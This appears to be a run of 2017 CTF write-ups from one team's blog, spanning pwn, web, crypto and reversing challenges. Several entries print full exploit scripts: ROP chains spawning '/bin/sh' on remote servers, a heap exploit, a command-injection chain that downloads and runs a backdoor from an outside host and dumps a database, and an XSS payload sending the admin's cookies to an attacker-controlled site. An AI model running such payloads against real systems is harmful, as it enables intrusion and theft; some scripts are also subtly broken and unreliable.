  {
    puts("No!");
    exit(1);
  }
  printf("Enter string (length %u): ", len);
  v3 = fileno(stdin);
  read(v3, buf, len);
  puts("Thanks, bye!");
  return 0;
}

There is still one small detail, though: at the end of main the saved value of esp is loaded back from the stack, so we actually have to add this value into our payload to make the application work. This is the relevant assembly at the end of main:

.text:080487E2 010                 pop     ecx ; This loads the saved esp value
.text:080487E3 00C                 pop     ebx
.text:080487E4 008                 pop     esi
.text:080487E5 004                 pop     ebp
.text:080487E6 000                 lea     esp, [ecx-4] ; And here it is restored
.text:080487E9 000                 retn

Finally, we can call system and get a shell: hxp{b4bY's_2nd_pwn4bLe}

Full exploit script:

from pwn import *

#r = process('./vuln')
r = remote('35.198.98.140', 45067)

r.recvuntil(':')
r.sendline('AAAABBBBCCCCDDD')
leak = r.recvuntil('Enter length:')
stack_leak = u32(leak[21:25])
libc_base = u32(leak[25:29]) - 0xCD18
print 'libc base:  ' + hex(libc_base)
print 'stack leak: ' + hex(stack_leak)

rop = ''
rop += p32(libc_base + 0x3A840) # system
rop += p32(0x08048471) # pop; ret
rop += p32(libc_base + 0x15CD48) # "/bin/sh"

r.sendline('-4294967286')
r.sendline('A' * 80 + p32(stack_leak + 0x10) + 'A' * 28 + rop)

r.interactive()

HXP CTF 2017 - cloud18

info@theromanxpl0.it (TRX) — Sun, 19 Nov 2017 00:00:00 +0000

We can:

Once we are authenticated, we can use a text editor.

We take choose a function, write a regex, write some text and have the text that matches the regex replaced with the output of our functions. (line 35-37)

    $editedText = preg_replace_callback("/" . $_POST["regex"] . "/", function ($matches) {
        return call_user_func($_POST["method"], $matches[0]);
    }, $_POST["text"]);

The client provides a couple of examples (line 43-48)

However the method is only checked by this snippet (line 7-9)

if (preg_match("/exec|system|passthru|`|proc_open|popen/", strtolower($_POST["method"].$_POST["text"])) != 0) {
    exit("Do you really think you could pass something to the command line? Functions like this are often disabled! Maybe have a look at the source?");
}

In index.php we notice that we have to execute /usr/bin/get_flag to get the flag

		echo "" . shell_exec("/usr/bin/get_flag") . "
";

However we cannot use shell_exec. But we can download the whole binary We craft a request that includes the file in the webpage and then download it.

method:file_get_contents
regex:\/usr\/bin\/get_flag
text:/usr/bin/get_flag

Now we should get some information reversing the binary.

Luckily the old strings get_flag | grep hxp worked hxp{Th1s_w2sn't_so_h4rd_now_do_web_of_ages!!!Sorry_f0r_f1rst_sh1tty_upload}

Codeblue CTF 2017 - Paillier Oracle

info@theromanxpl0.it (TRX) — Sat, 11 Nov 2017 00:00:00 +0000

We have a service and we are given the source code. When we connect we have to submit a proof of work, after that we will receive the encrypted flag. We can then send cipher text to the server and get the least significant bit of the decrypted text.

The first thing you find looking for the Pailler Cryptosystem is that:

$(n, g)$ is the public key
given an ecrypted message $c = enc(m)$ you can craft another encrypted message so that is decrypts to $m + m_1$ or $mm_2$.

So we can control the decrypted text (kind of).

I worked offline at first with a mock flag.

The first idea I came up with was to send a message that decrypts to $m2^{-1}$ and build the flag 1 bit at a time. This worked for a couple of bit, but sometimes randomly not.

That’s because multiplying for $2^{-1} \mod n^2$ is not really an integer division!

So I came up with this:

if the binary representation of $m$ (the flag for example) ends with $0$ we can craft a message that decrypts to $m2^{-1}$ and get the bit following the last zero (like a shift to the right)
if $m$ does not end with $0$ we can send a message that decrypts to $(m - 1) * 2^{-1}$ and get the next bit

The server can tell us the last bit of $m$. So how we get the flag?

Get the encrypted_flag (ef) from the server
Get the least significant bit and set it on our partial flag
Send m so that dec(m) $ = (ef - flag)/ 2^{len(flag)} = ef \gg len(flag)$
Repeat from 2

It was pretty cool because when I started the script and I got } as the first character and I was like ‘wow it works’, but then I started to get random hex characters and not my mock flag.

Well I had forgotten that I switched to the remote server :P

I had a video of the run, but it got overwritten by an attempt to solve Smoke on the Water.

Python solution

I have pwntools on a virtualenv and it didn’t play well with SageMath, so back to plain old python

flag = 0
l = 0
# i = g^(-1), j = 2^(-1)
while l < 8 * 100:
    # dec((ef * g^(-flag)) ^ (2^(-l))) = (flag - knownbits) >> l
    flag |= (getLSB(pow(encrypted_flag * pow(i, flag, n2), pow(j, l, n2), n2)) << l)
    l += 1
    # print pt
    if l % 8 == 0:
        print unhexlify(format(pt, 'x'))

We have these two nice properties in the Paillier Cryptosystem

$$dec(m g^{k}) = m + k \mod n^2$$$$dec(m^{k}) = mk \mod n^2$$

Helper functions

def getLSB(m):
    '''
    Get LSB from the server
    '''
    r.sendline(str(m))
    es = r.recvline()
    lsb = int(es[-2])
    r.recvuntil(loop)
    return lsb

Codeblue CTF 2017 - Secret Mailer Service

info@theromanxpl0.it (TRX) — Sat, 11 Nov 2017 00:00:00 +0000

For this challenge we’re given the binary of a service, mailer. There are 5 letters allocated on the stack which we can work on, and every time a letter is referenced the code checks if the index is valid - no exploits there. The service allows us to write, delete and post letters, where posting a letter really means writing out its contents to /dev/null with the ability to use a filter. It’s in the filter selection that we find our vulnerability:

int post_letter(Letter *letters, FILE *s)
{
    int v3;
    int v4;

    puts("\nWhich letter do you want to post?");
    printf("ID (0-%d): ", 4);
    v4 = read_number();
    if ( v4 < 0 || v4 > 4 || !letters[v4].present )
        return puts("Invalid ID.");
    puts("\nWhich filter do you want to apply?");
    filter_menu();
    v3 = read_number();
    if ( v3 > 2 )
        return puts("Invalid filter.");
    filters[v3](s, letters[v4].data, letters[v4].length);
    return puts("\nDone!");
}

The filter id is only checked to be <= 2 and not >= 0. This allows us to input a negative number in there and, since the filters are implemented as a lookup table of function addresses, we can basically call whatever function we want, as long as the parameters are compatible. What I did was call the setbuf entry in plt by using index -15, thus setting the data of one of the filters as the buffer for /dev/null. The nice part here is that libc assumes this buffer to be at least 8192 bytes long, so by posting other letters we can overflow it.

Let’s have a quick look at how a letter is saved in memory:

00000000 Letter          struc ; (sizeof=0x108, mappedto_5)
00000000 present         dd ?
00000004 length          dd ?
00000008 data            db 256 dup(?)
00000108 Letter          ends

And at the stack of the main loop (please note this is the inverted stack layout used by ida, lower addresses are on top):

-0000053C stream          dd ?                    ; /dev/null
-00000538 var_538         dd ?
-00000534 var_534         dd ?
-00000530 data            Letter 5 dup(?)
-00000008 var_8           dd ?
-00000004 var_4           dd ?
+00000000  s              db 4 dup(?)
+00000004  r              db 4 dup(?)

The logical thing to do now is overflow the buffer for the last letter, getting full control of the return address while leaving the other entries free for our use - remember that to overflow the buffer we have to post other letters’ contents. Unfortunately, we still don’t know any libc address, so that’s what we’re going to focus on next. I did it in a quite convoluted way, but a way I liked: I realized that we could return first to the read_letter function, whose role is to read a string into a buffer, and give it the address of some free memory area in order to write a format string there, and then call printf to leak a plt address. The end of this first step is returning back to the main loop, now knowing libc’s base address.

For the second and last step, I used the same setbuf and read_letter calls, only this time providing "/bin/sh" instead of "%s" to the latter. Then the logical thing was to call system on the buffer, getting a shell on the remote server. A couple of commands later, I got this: CBCTF{4R3_YOU_w4RM3D_UP_f0R_MORE_PWNabLeS?}

Hell, this one took me a long time to figure out and it was only meant to be a warmup?

This is the full exploit script:

from pwn import *

def chunks(data, step):
	for i in range(0, len(data), step):
		yield data[i:min(i+step, len(data))]

def add_letter(r, letter):
	r.recvuntil('> ')
	r.sendline('1')
	r.recvuntil('Input your contents:')
	r.sendline(letter)

def delete_letter(r, letterid):
	r.recvuntil('> ')
	r.sendline('2')
	r.recvuntil('(0-4):')
	r.sendline(str(letterid))

def post_letter(r, letterid, filterid):
	r.recvuntil('> ')
	r.sendline('3')
	r.recvuntil('(0-4):')
	r.sendline(str(letterid))
	r.recvuntil('> ')
	r.sendline(str(filterid))


libc = ELF('./libc.so.6')

r = remote('sms.tasks.ctf.codeblue.jp', 6029)
#r = process('./mailer')


### First step: obtain libc base address

buf_addr = 0x0804B040
p = 'A' * (256 + 12)

# write the format string using read_letter
p += p32(0x080486D9) # read_letter
p += p32(0x08048daa) #pop;pop;ret
p += p32(buf_addr)
p += p32(4)

# call printf("%s", plt.atoi)
p += p32(0x080484C0)
p += p32(0x08048daa) #pop;pop;ret
p += p32(buf_addr)
p += p32(0x0804B03C) # got address for atoi

# call main_loop once again
p += p32(0x08048BD0)

for i in range(5):
	add_letter(r, '')
delete_letter(r, 0)

# setbuf(/dev/null, letters[4].data)
post_letter(r, 4, -15)

for chunk in chunks(p, 200):
	print 'Chunk: ' + chunk
	add_letter(r, chunk)
	post_letter(r, 0, 0)
	delete_letter(r, 0)

r.sendline('4');
r.recvuntil(':)')
r.sendline('%s')
r.readline()
dump = r.readline()

atoi_addr = ord(dump[0]) + (ord(dump[1]) << 8) + (ord(dump[2]) << 16) + (ord(dump[3]) << 24)
print 'Atoi addr: 0x%x' % atoi_addr
libc_addr = atoi_addr - libc.symbols['atoi']
print 'Libc base: 0x%x' % libc_addr


### Second step: call system("/bin/sh")

p = 'A' * (256 + 12)

# write /bin/sh using read_letter
p += p32(0x080486D9) # read_letter
p += p32(0x08048daa) #pop;pop;ret
p += p32(buf_addr)
p += p32(16)

# call system("/bin/sh")
p += p32(libc_addr + libc.symbols['system'])
p += p32(0x08048dab) #pop:ret
p += p32(buf_addr)

# call fail
p += p32(0x0804868B)

for i in range(5):
	add_letter(r, '')
delete_letter(r, 0)

# setbuf(/dev/null, letters[4].data)
post_letter(r, 4, -15)

for chunk in chunks(p, 200):
	print 'Chunk: ' + chunk
	add_letter(r, chunk)
	post_letter(r, 0, 0)
	delete_letter(r, 0)

r.sendline('4')
r.recvuntil(':)')
r.sendline('/bin/sh')

r.interactive()

Codeblue CTF 2017 - Common Modulus 1

info@theromanxpl0.it (TRX) — Fri, 10 Nov 2017 00:00:00 +0000

Next in the series Common Modulus 2

Quick summary of RSA $cipher text = message^e \mod N$

We have a message (the flag) encrypted with the same $N$, but with two different $e$. As the name suggests the solution to this problem is a common modulus attack

The idea of the attack is that if we know

$m^{e_1} \mod N$
$m^{e_2} \mod N$
$MCD(e_1, e_2) = 1$

then we can recover $m$.

Luckily $e_1$ and $e_2$ and two random generated primes so it is very likely that (3) holds and we have (1) (2) because we have the two cipher texts.

Explanation of the attack

The Bézout’s identity guarantees that we can find with the Extended Euclidean algorithm $x$ and $y$ so that $xe_1 + ye_2 = 1$. We can use this fact to compute $m$.

We are given the cipher texts $c_1 = m^{e_1} \mod N$ and $c_2 = m^{e_2} \mod N$

If we raise $c_1$ to the $x-th$ power modulo $N$ we get $c_1^{x} = (m^{e_1})^{x} = m^{xe_1} \mod N$ similary with $c_2$ and $y$ we get $c_2^{y} = m^{ye_2} \mod N$

If we multiply them we get $m^{xe_1}m^{ye_2} = m^{xe_1 + ye_2} \mod N$, but we have proven that the exponent is actually equal to $1$! So what we really get is $m$!

Note: One of $x$ and $y$ will be negative

Solution SageMath script

from binascii import unhexlify
def solve(e1, e2, n, c1, c2):
    d, x, y = xgcd(e1, e2)
    m = (pow(c1, x, n) * pow(c2, y, n)) % n
    print unhexlify(hex(long(m))[2:-1])

Codeblue CTF 2017 - Common Modulus 2

info@theromanxpl0.it (TRX) — Fri, 10 Nov 2017 00:00:00 +0000

Next in the series Common Modulus 3

We have solved Common Modulus 1, but now there’s more!

e = 3 * get_random_prime(20)

Mmmmh now $MCD(e_1, e_2) = 3 \ne 1$ so we can’t get the flag as easily.

That is because the $x$ and $y$ we find with the Extended Euclidean algorithm will be so that $xe_1 + ye_2 = 3$ (again thanks to the Bézout’s identity). What we get is $m^3 \mod N$, still not that bad.

We notice that $m^3$ is quite smaller than $N$ and also that the flag is surely shorter that 2048/3 = 682 bits roughly 85 characters.

We can actually take the cube root of $m^3$ and recover the flag!

Solution SageMath script

from binascii import unhexlify
import string
def solve(e1, e2, n, m1, m2):
    d, x, y = xgcd(e1, e2)
    c = (pow(m1, x, n) * pow(m2, y, n)) % n
    print unhexlify(hex(long(pow(long(c), 1/3)))[2:-1])

Codeblue CTF 2017 - Common Modulus 3

info@theromanxpl0.it (TRX) — Fri, 10 Nov 2017 00:00:00 +0000

We have solved Common Modulus 1 and Common Modulus 2, but now there’s even more!

Bigger public exponent? Check

e = 17 * get_random_prime(20)

Padding? Check

while len(flag) * 4 < 8192:
  flag += '00'

FLAG = long(flag[:-2], 16)

Proper padding? Luckily not!

We have to:

Remove the padding
take the seventeen-th root of the message (at least hope we can)

The bigger public modulus let’s us hope for the best ($8192 / 17 = 481$ bits or circa 60 bytes).

Since flag is parsed as a base 16 integer the 00 padding is just a multiplication by $2^4$. We don’t know how many 00 of padding there are, but we know that it is more than 0 and less that 8192/4 so we can happily brute force that!

Remember that multiplication for $2^{-4} \mod N$ is actually just like dividing by $2^{4} \mod N$ or cancelling a 00

for i in range(0, 2048):
    try:
        m17unpadded = (m17padded * pow(2, -17*4*i, n)) % n
    ...

Then we try to take the 17-th root

m, _ = ZZ(m17unpadded).nth_root(d, truncate_mode=1)

And check for a known plaintext like CBCTF

flag = unhexlify(hex(long(m))[2:].replace('L', ''))
    if 'CBCTF{' in flag:
        print flag
        break

I did mess up a couple of times during the competition, but in the end we got the flag.

N.B. I renamed a couple of variables and didn’t test the code again

Solution SageMath script

from binascii import unhexlify
import string
def solve(e1, e2, n, c1, c2):
    d, x, y = xgcd(e1, e2)
    print d
    m17padded = (pow(c1, x, n) * pow(c2, y, n)) % n # (flag * 2**x)**17 = flag ** 17 * 2**17x
    for i in range(0, 2048):
        try:
            m17unpadded, _ = ZZ(m17padded * pow(2, -d*4*i, n)).nth_root(d, truncate_mode=1)
            flag = unhexlify(hex(long(m17unpadded))[2:].replace('L', ''))
            if 'CBCTF{' in flag:
                print flag
                break
        except TypeError as e:
            # debugging debugging debugging
            print e
            print long(m17unpadded)
            pass

Hitcon CTF 2017 - Baby Revenge

info@theromanxpl0.it (TRX) — Mon, 06 Nov 2017 00:00:00 +0000

The page’s code is:

    $sandbox = '/home/andrea/Desktop/fff/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
	highlight_file(__FILE__);

You can execute a shell command but you have only 5 bytes.

My idea is to use the ’ls’ output to write in a file and execute it.

The target file is ‘\’ so it does not affect the shell script semantics.

The procedure is:

create a file
redirect ls output to ‘\’
remove the file.

I want to write ‘wget myserver.com’ in this way, and after execute it.

In myserver i have a bash http backdoor, so after downloading it i want to execute it.

import requests
import progressbar

#obfuscated code using ls (max 5 byte each command)
#'wget tuly.pythonanywhere.com; sh index.html'
code = """
>IFS\
ls>>\
rm I*
>=:
ls>>\
rm =:
>a=\
ls>>\
rm a*
>wg\
ls>>\
rm w*
>et:\
ls>>\
rm e*
>tul\
ls>>\
rm t*
>y.\
ls>>\
rm y*
>pyt\
ls>>\
rm p*
>hon\
ls>>\
rm h*
>any\
ls>>\
rm a*
>whe\
ls>>\
rm w*
>re.\
ls>>\
rm r*
>com
ls>>\
rm c*
>b=\
ls>>\
rm b*
>mv:\
ls>>\
rm m*
>ind\
ls>>\
rm i*
>ex.\
ls>>\
rm e*
>ht\
ls>>\
rm h*
>ml:\
ls>>\
rm m*
>p
ls>>\
rm p*
>\$a
>\$b
ls>>\
"""

url = "http://52.199.204.34/"

lines = code.split("\n")

print "Writing downloader..."
with progressbar.ProgressBar(max_value=len(lines)) as bar:
    for i in xrange(len(lines)):
        l = lines[i].rstrip()
        if l == "":
            continue
        requests.get(url + "?cmd=" + l)
        bar.update(i)

print "Executing downloader..."
requests.get(url + "?cmd=sh \\")

print "Executing backdoor..."
requests.get(url + "?cmd=sh p")

In the home directory of the system we found that the flag is in the MySQL db

Having a polling backdoor we needed to use one command to exfiltrate the flag from the DB, so we used something like this: mysqldump -u user -p'password' flagdb Now, there was some issues we faced:

A lock made our dump query fail
The database contained chinese characters that as well made our dump query fail With this in mind we rewrote our query to something like this mysqldump -u user -p'password' flagdb --single-transaction --compatible-charset

Hitcon CTF 2017 - Start

info@theromanxpl0.it (TRX) — Mon, 06 Nov 2017 00:00:00 +0000

The given binary is static.

Checksec:

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

The main procedure is so simple:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [rsp+0h] [rbp-20h]
  unsigned __int64 v5; // [rsp+18h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  alarm(10LL, argv, envp);
  setvbuf(stdin, 0LL, 2LL, 0LL);
  setvbuf(stdout, 0LL, 2LL, 0LL);
  while ( read(0LL, &v4, 217LL) != 0 && (unsigned int)strncmp(&v4, "exit\n", 5LL) )
    puts(&v4);
  return 0;
}

If we have a leak of the canary we can overwrite the return address with the buffer overflow.

Sending 24 characters and newline the puts call will print out the canary (overwriting the last byte, but it is always 0).

It’s time to build a rop chain.

I used ROPGadget to generate it but it was too long.

So i changed the chain a bit:

p += p64(0x00000000004017f7) # pop rsi ; ret
p += p64(0x00000000006cc080) # @ .data
p += p64(0x000000000047a6e6) # pop rax ; pop rdx ; pop rbx ; ret
p += '/bin//sh'
p += p64(0x4141414141414141) # padding
p += p64(0x4141414141414141) # padding
p += p64(0x0000000000475fc1) # mov qword ptr [rsi], rax ; ret
p += p64(0x00000000004017f7) # pop rsi ; ret
p += p64(0x00000000006cc088) # @ .data + 8
p += p64(0x000000000042732f) # xor rax, rax ; ret
p += p64(0x0000000000475fc1) # mov qword ptr [rsi], rax ; ret
p += p64(0x00000000004005d5) # pop rdi ; ret
p += p64(0x00000000006cc080) # @ .data
p += p64(0x00000000004017f7) # pop rsi ; ret
p += p64(0x00000000006cc088) # @ .data + 8
p += p64(0x0000000000443776) # pop rdx ; ret
p += p64(0x00000000006cc088) # @ .data + 8
p += p64(0x000000000042740e) # add eax, 0x1d ; ret
p += p64(0x000000000042740e) # add eax, 0x1d ; ret
p += p64(0x0000000000468320) # add rax, 1 ; ret
p += p64(0x0000000000468e75) # syscall ; ret

Ok now we must build the exploit using pwntools-ruby:

z = Sock.new '127.0.0.1', 31338;

#canary leak
z.sendline "A"*24 ;
z.recvline;
r = z.recvline;
canary = "\x00" + r[0..6];

#build payload
p = "a"*24 + canary + p64(0x6cc018); #0x6cc018 id rbp
p += p64(0x00000000004017f7);
p += p64(0x00000000006cc080);
p += p64(0x000000000047a6e6);
p += '/bin//sh';
p += p64(0x4141414141414141);
p += p64(0x4141414141414141);
p += p64(0x0000000000475fc1);
p += p64(0x00000000004017f7);
p += p64(0x00000000006cc088);
p += p64(0x000000000042732f);
p += p64(0x0000000000475fc1);
p += p64(0x00000000004005d5);
p += p64(0x00000000006cc080);
p += p64(0x00000000004017f7);
p += p64(0x00000000006cc088);
p += p64(0x0000000000443776);
p += p64(0x00000000006cc088);
p += p64(0x000000000042740e);
p += p64(0x000000000042740e);
p += p64(0x0000000000468320);
p += p64(0x0000000000468e75);
z.send p;
z.recvline;
z.sendline "exit"; #go to 'ret'

#send command to the shell
z.sendline("uname -a");
print z.recv(5000)

After testing it in localhost with socat, i wrote a python script that I used to send the ruby exploit:

from pwn import *

def run(cmd):
    expl = '''z = Sock.new '127.0.0.1', 31338;z.sendline "A"*24 ;r = z.recvline;r = z.recvline;canary = "\x00" + r[0..6];p = "a"*24 + canary + p64(0x6cc018) ;p += p64(0x00000000004017f7);p += p64(0x00000000006cc080);p += p64(0x000000000047a6e6);p += '/bin//sh';p += p64(0x4141414141414141);p += p64(0x4141414141414141);p += p64(0x0000000000475fc1);p += p64(0x00000000004017f7);p += p64(0x00000000006cc088);p += p64(0x000000000042732f);p += p64(0x0000000000475fc1);p += p64(0x00000000004005d5);p += p64(0x00000000006cc080);p += p64(0x00000000004017f7);p += p64(0x00000000006cc088);p += p64(0x0000000000443776);p += p64(0x00000000006cc088);p += p64(0x000000000042740e);p += p64(0x000000000042740e);p += p64(0x0000000000468320);p += p64(0x0000000000468e75);z.send p;z.recvline;z.sendline "exit"; z.sendline("''' + cmd + '''"); print z.recv(5000)'''

    sh = remote("54.65.72.116", 31337)
    sh.recvuntil("> ")
    sh.sendline(expl)
    print sh.recvall()


c = raw_input("> ")
while c != "q":
    run(c)
    c = raw_input("> ")

Now you can navigate the filesystem and get the flag.

Hack.lu CTF 2017 - HeapHeaven

info@theromanxpl0.it (TRX) — Thu, 19 Oct 2017 00:00:00 +0000

from pwn import *

def wiWaIfy(n):
 def helper(n):
 if n == 1:
 return 'wi'
 if n%2 == 1:
 return helper(n//2) + 'wi'
 else:
 return helper(n//2) + 'wa'
 q = helper(n)
 if q[-2:] == 'wa':
 q = q[:-2] + 'we'
 return q


libc_elf = ELF("./libc.so.6")

#p = process('env LD_LIBRARY_PATH=. ./HeapHeaven', shell=True)
p = remote("flatearth.fluxfingers.net", 1743)

#alloc
def whaa(num):
 p.recvuntil("NOM-NOM\n")
 p.sendline("whaa!")
 p.recvline()
 p.sendline(wiWaIfy(num))

#read
def mommy(num):
 p.recvuntil("NOM-NOM\n")
 p.sendline("mommy?")
 p.sendline(wiWaIfy(num))
 p.recvuntil("darling: ")
 return p.recvline(False)

#write
def spill(num, val):
 p.recvuntil("NOM-NOM\n")
 p.sendline("<spill>")
 p.recvline()
 p.sendline(wiWaIfy(num))
 p.recvuntil("darling!\n")
 p.sendline(val)

#free
def nom_nom(num):
 p.recvuntil("NOM-NOM\n")
 p.sendline("NOM-NOM")
 p.sendline(wiWaIfy(num))


#phase 1 - libc leak
whaa(0x80)
whaa(0x80)
nom_nom(0x20)
r = mommy(0x20)

while len(r) < 8:
 r += "\0"
arena = u64(r)
#0x3c4b78 arena offset
libc = arena - 0x3c4b78
print "Arena: %lx" % arena
print "Libc: %lx" % libc

nom_nom(0x20+0x90) #to clean

#phase 2 - happa leak
whaa(0x60) #A
whaa(0x60) #B
whaa(0x80) #C

nom_nom(0x90) #B
nom_nom(0x20) #A
nom_nom(0x90) #B

r = read(0x20) #A
while len(r) < 8:
 r += "\0"
happa = u64(r) - 0x80
print "Happa: %lx" % happa

#phase 3 - overwrite libc's free_hook (cause GOT is rdonly)
free_hook = libc + libc_elf.symbols["__free_hook"]

print "free_hook_ptr: %lx" % free_hook_ptr

off = (free_hook_ptr - happa)
print "Offset: %lx" % off

spill(off, p64(libc + libc_elf.symbols["system"]))
spill(0x20, "/bin/sh\x00") #A

p.sendline("NOM-NOM")
p.sendline(0x20) #A -- open shell

p.interactive()

Hack.lu CTF 2017 - Mistune

info@theromanxpl0.it (TRX) — Thu, 19 Oct 2017 00:00:00 +0000

We can send a message to the admin.
The admin clicks on the links and we have to steal his cookies.

The idea is to use javascript to redirect the admin to a website we control. We used one of the many free hosting sites

<javascript:document.location='hello.myserver.com/?cookie='+document.cookies>

Hack.lu CTF 2017 - Prime Enigma

info@theromanxpl0.it (TRX) — Thu, 19 Oct 2017 00:00:00 +0000

We have

\begin{equation} B = g^d \mod p \label{eq:b} \end{equation}

\begin{equation} k = A^d \mod p \label{eq:k} \end{equation}

\begin{equation} c = k m \mod p \label{eq:c} \end{equation}

We know $B$, $g$, $p$, $A$ and $c$ and we want to recover $m$.

The only unknown in \eqref{eq:b} is $d$. Luckily $B = g^d \equiv p-1 \equiv -1 \mod p$ So $(g^d)^2 \equiv 1 \mod p$

We also know that $g^{p-1} \equiv 1 \mod p$ So dividing repeatedly $p-1$ by $2$ we will get some $d’$ such that $g^{d’} \equiv -1 \mod p$

Well $d = \frac{p-1}{2}$.

We can compute easily $k$ (we now know $A$, $d$ and $p$). We compute his modular multiplicative inverse modulo $p$ and multiply that with $c$ to get $m$.

Challenge

from secret import flag, key

f = open('ciphertext.txt', 'w')

p = ...
g = 5
A = ...
d = key
m = int(flag.encode('hex'), 16) % p

B = pow(g, d, p)
k = pow(A, d, p)
c = k * m % p

f.write(str(B) + '\n')
f.write(str(c) + '\n')

f.close()

Hack Dat Kiwi CTF 2017 - Eluware1 Writeup

info@theromanxpl0.it (TRX) — Mon, 16 Oct 2017 00:00:00 +0000

The Eluware 1 challenge was quite simple. A copy of a website was displayed with a malicious www.malware.com/md5.js script added to it. The script contained a flag() function, which when called from the Js console returned the flag to be submitted. Probably the easiest 100 points I ever got in a challenge.

Hack Dat Kiwi CTF 2017 - Pppoly Writeup

info@theromanxpl0.it (TRX) — Mon, 16 Oct 2017 00:00:00 +0000

This was a nice reversing challenge, starting with a php file:

$password='KIWIMASTER';
$d='3c3f7068700a24703d275a47566d49484e725... [rest of hex data removed for clarity]';
eval(substr(pack("H*",$d),5));

The obvious first thing to do was changing that eval for an echo in order to get this:

$p='ZGVmIHNrZXdlcih0KToK... [rest of base64 data removed]';
$p=str_replace("pb24", base64_encode($password), base64_decode($p));
function into_temp($code)
{
    $f=tempnam(null,"polyglot_");
    file_put_contents($f, $code);
    return $f;
}
function sys($code,$pl)
{
    return shell_exec($pl." ".into_temp($code));
}
if (strpos($r=sys($p,"python"),"YES")!==false and ctype_alnum($password)) $r.=md5($password);
echo $r;

What it does is base64 decode the data contained in $p, put the password in place of the pb24 placeholder and execute it as python, collecting its output. If the output contains “YES” then the md5 of the password is calculated, which will become the flag. Let’s have a look at the python code, shall we?

def skewer(t):
    return ord(t)-53;

import sys,base64,os,re;

password=base64.b64decode("pb24");
r=[chr((x+5+y**2)%256) for y,x in enumerate([skewer(x)+7%256 for x in password])];

code='''
#code here
use MIME::Base64;
my $pwd=decode_base64("JASUS");
$pwd=substr($pwd,-3).substr($pwd,0,(length $pwd) -3);
#print $pwd;
use File::Temp qw(tempfile);
($fh, $filename) = tempfile( );
my $code="<".<<'Y';
?php $p='JERKY';echo $flag=$p[0]=='A'?$p[1]=='S'?$p[2]=='S'?$p[3]=='H'?$p[4]=='A'?$p[5]=='I'?$p[6]=='R'?strlen($p)==7?'YES, the flag is: ':0:0:0:0:0:0:0:'NO';
Y
$code =~ s/JERKY/$pwd/g; print $fh $code;print `php ${filename}`;
'''.replace('JASUS',base64.b64encode("".join(r)));

import tempfile;
f = tempfile.NamedTemporaryFile(delete=False);
f.write(code);
f.close();
print os.popen("perl "+f.name).read();

What we get is another layer of indirection, this time using a perl script and collecting its output. There is also some password mangling going on in the first lines, but nothing we can’t easily reverse later. The perl script uses a similar scheme as the other layers, calling a small php snippet that checks the password. Here it is formatted a little better:


$p='JERKY';
echo $flag =
    $p[0]=='A'?
        $p[1]=='S'?
            $p[2]=='S'?
                $p[3]=='H'?
                    $p[4]=='A'?
                        $p[5]=='I'?
                            $p[6]=='R'?
                                strlen($p)==7?
                                    'YES, the flag is: '
                                :0
                            :0
                        :0
                    :0
                :0
            :0
        :0
    :'NO';

Where “JERKY” is as usual a placeholder for the password. From the checks we can easily see that the password has to be a very polite “ASSHAIR” in order for this code to print the success message. It still doesn’t print the flag, so that’s what we’re going to focus on next.

The first obstacle we meet is the following perl line, which simply rotates the string, meaning the password now has to be “HAIRASS” for the checks to work as we want them to:

$pwd=substr($pwd,-3).substr($pwd,0,(length $pwd) -3);

Then we get back to the python layer, with a slightly more complicated mangling function:

def skewer(t):
    return ord(t)-53;

r=[chr((x+5+y**2)%256) for y,x in enumerate([skewer(x)+7%256 for x in password])];

Here r must contain ['H','A','I','R','A','S','S'] after the mangling has occurred. We could either run this through an automated solved or reverse the function by hand. I chose the latter and wrote the following to do so:

print "".join([chr(ord(ch) - i**2 + 41) for i,ch in enumerate("HAIRASS")])

Which quickly gave me back qinrZcX as the password to put into the original file in order to get the flag. As an afterthought, I could have just calculated its md5 instead of running the php, but I was sure it wouldn’t harm my computer and it was just as easy to do.

Flare-On 2017 writeups

info@theromanxpl0.it (TRX) — Sat, 14 Oct 2017 00:00:00 +0000

Flare what?

The Flare-On competition is an annual reverse engineering competition run by FireEye and mostly Windows-based. This was the first time I took part in it, and I have to admit some of the challenges were, uhm, challenging. In the end I managed to solve the first six problems out of 12.

Challenge 1: login.html

“Welcome to the Fourth Flare-On Challenge! The key format, as always, will be a valid email address in the @flare-on.com domain.”

For the first challenge we get an HTML document. Opening it in a browser reveals a form for checking the flag. Once we view the script contained in the source code we basically have the flag in plain sight:

All that’s left to do is to apply the ROT13 algorithm to “PyvragFvqrYbtvafNerRnfl@syner-ba.pbz” in order to get the flag: ClientSideLoginsAreEasy@flare-on.com

Challenge 2: IgniteMe.exe

“You solved that last one really quickly! Have you ever tried to reverse engineer a compiled x86 binary? Let’s see if you are still as quick.”

This time we get a windows executable to work with, IgniteMe.exe. When we run it, we’re prompted with the uber-l33t statement "G1v3 m3 t3h fl4g:". Putting in a random string only gets us to the even l33t3r "N0t t00 h0t R we? 7ry 4ga1nz plzzz!" After opening the file in IDA we can see that it xor encrypts the input and checks it against some data. sub_401000 is used to get an initial seed, which I found out to be the number 4 using the debugger. Then the rest easily followed, I wrote the inverse algorithm into the following program and run it to get the flag:

#include 

char data[39] = {0x0D, 0x26, 0x49, 0x45, 0x2A, 0x17, 0x78, 0x44, 0x2B, 0x6C, 0x5D, 0x5E, 0x45, 0x12,
				0x2F, 0x17, 0x2B, 0x44, 0x6F, 0x6E, 0x56, 0x09, 0x5F, 0x45, 0x47, 0x73, 0x26, 0x0A,
				0x0D, 0x13, 0x17, 0x48, 0x42, 0x01, 0x40, 0x4D, 0x0C, 0x02, 0x69};
char result[40];

int main()
{
	int key = 4;
	for(int i = 38; i >= 0; i--)
	{
		result[i] = data[i] ^ key;
		key = result[i];
	}
	result[39] = '\0';
	printf("%s\n", result);
}

It quickly gave me R_y0u_H0t_3n0ugH_t0_1gn1t3@flare-on.com as the answer.

Challenge 3: greek_to_me.exe

“Now that we see you have some skill in reverse engineering computer software, the FLARE team has decided that you should be tested to determine the extent of your abilities. You will most likely not finish, but take pride in the few points you may manage to earn yourself along the way.”

